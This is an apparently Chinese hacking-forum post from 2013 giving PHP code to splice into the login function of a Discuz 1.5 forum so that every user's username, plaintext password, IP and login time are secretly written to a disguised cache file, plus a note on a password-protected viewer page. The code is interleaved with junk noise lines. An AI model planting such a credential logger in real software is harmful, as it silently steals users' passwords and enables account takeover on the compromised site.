中国网络渗透测试联盟
标题:
dz1.5记录用户名和密码
[打印本页]
作者:
admin
时间:
2013-2-27 21:40
标题:
dz1.5记录用户名和密码
修改uc_client目录下的client.php 在
7 k( d7 s" ]( h& K( \
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
% O4 I8 E" o4 ]4 @8 H
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
' T3 D! E* v" P' i% ]' Y* }/ V
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
) c- [( h3 O5 V' S. K \5 B
if(getenv('HTTP_CLIENT_IP')) {
; U, z. ?8 f8 O3 Z$ V
$onlineip = getenv('HTTP_CLIENT_IP');
; F% W! m3 \6 B w) o) Z8 X- D
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
" j& S0 I+ X4 ~; P
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
, e8 J" V1 a4 O8 t- k% \7 A7 r
} elseif(getenv('REMOTE_ADDR')) {
" L" y+ u b' v3 n+ s7 A
$onlineip = getenv('REMOTE_ADDR');
- z/ @; B# ]1 I# a3 m. ?, ^- ^' U
} else {
( d% ?+ g- K( N3 J3 u3 l5 e
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
6 _$ V0 w& U/ @% v7 c6 i) ^9 I
}
1 }/ z; x2 C9 e- h
$showtime=date("Y-m-d H:i:s");
3 s7 R0 P* d' D! _, G
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
{5 F. |' k$ g9 T( [" t
$handle=fopen('./data/cache/csslog.php','a+');
; P) F2 g2 w3 S
$write=fwrite($handle,$record);
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2